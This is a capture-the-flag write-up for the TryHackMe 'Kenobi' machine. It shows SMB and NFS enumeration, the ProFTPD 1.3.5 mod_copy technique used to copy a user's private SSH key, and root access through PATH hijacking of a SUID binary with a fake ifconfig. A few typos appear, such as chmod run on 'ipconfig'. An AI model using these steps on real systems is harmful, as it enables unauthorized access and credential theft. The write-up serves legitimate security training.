Posts Kenobi Writeup [THM]
Post
Cancel

Kenobi Writeup [THM]

Kenobi is a Linux machine from tryhackme , it consists on enumerating smb shares, mounting a directory listed by rpcbind, exploiting proftpd to gain initial access and doing a path hijacking attack to obtain root

Enumeration

Running nmap :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
nmap -sC -sV 10.10.197.74
Starting Nmap 7.80 ( httpsexecuting://nmap.org ) at 2020-08-14 00:30 CEST
Host is up (0.055s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesnt have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Enumerating smb shares :

1
2
3
4
5
6
smbclient -L \\\\10.10.197.74\\
Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
anonymous       Disk      
IPC$            IPC       IPC Service (kenobi server (Samba, Ubuntu))

We see that anonymous share is enabled, we can access it without providing any password :

1
2
3
4
5
6
7
smbclient \\\\10.10.197.74\\anonymous
smb: \> dir
  .                                   D        0  Wed Sep  4 12:49:09 2019
  ..                                  D        0  Wed Sep  4 12:56:07 2019
  log.txt                             N    12237  Wed Sep  4 12:49:09 2019
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (68.3 KiloBytes/sec) (average 68.3 KiloBytes/sec)

Reading the first lines of that file shows that an ssh key has been created for user kenobi :

1
2
3
4
head -n 3 log.txt
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa):
Created directory '/home/kenobi/.ssh'.

As port 111 was open , we will enumerate it using nmap in order to see if there are any mounts available :

1
2
3
4
5
6
7
8
9
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.197.74
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-14 00:44 CEST
Nmap scan report for 10.10.197.74
Host is up (0.044s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount:
|_  /var *

We see that we can mount /var directory, this might result interesting later.

Exploitation

Searching for exploits for ProFTPD 1.3.5 we find the following mod_copy exploit https://www.exploit-db.com/exploits/36742

This allows us to copy files from one directory to another without being authenticated

As we had previously found the route to ssh keys from Kenobi and we know we can mount /var, we can just copy that ssh keys to /var :

1
2
3
4
5
6
nc 10.10.197.74 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.197.74]
site cpfr /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
site cpto /var/tmp/id_rsa
250 Copy successful

Now we just need to mount /var in our local machine :

1
 mount 10.10.197.74:/var /mnt/kenobiNFS

Accessing ssh :

1
2
chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.197.74

Privilege escalation

We tried to run sudo -l, but we were asked for a password, therefore we searched for suid binaries :

1
2
find / -perm -u=s -type f 2>/dev/null
/usr/bin/menu

That suid caught my eye, checking its source code it was revealed that it run some commands without using its full path, so it is vulnerable to a Path Hijacking attack.

1
2
3
4
strings /usr/bin/menu                                                                          
curl -I localhost
uname -r
ifconfig

First we are going to create our malicious file inside a directory with writing permissions such as tmp, we will replace ifconfig :

1
2
3
cd /tmp
touch ifconfig
echo "/bin/bash" > ifconfig

Then we will change the path :

1
export PATH=/tmp:$PATH

Finally we give our file execute permissions and run menu selecting option 3, we will be granted a root shell :

1
2
3
4
5
6
7
8
9
kenobi@kenobi:/tmp$ chmod +x ipconfig
kenobi@kenobi:/tmp$ menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
root@kenobi:/tmp# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
This post is licensed under CC BY 4.0 by the author.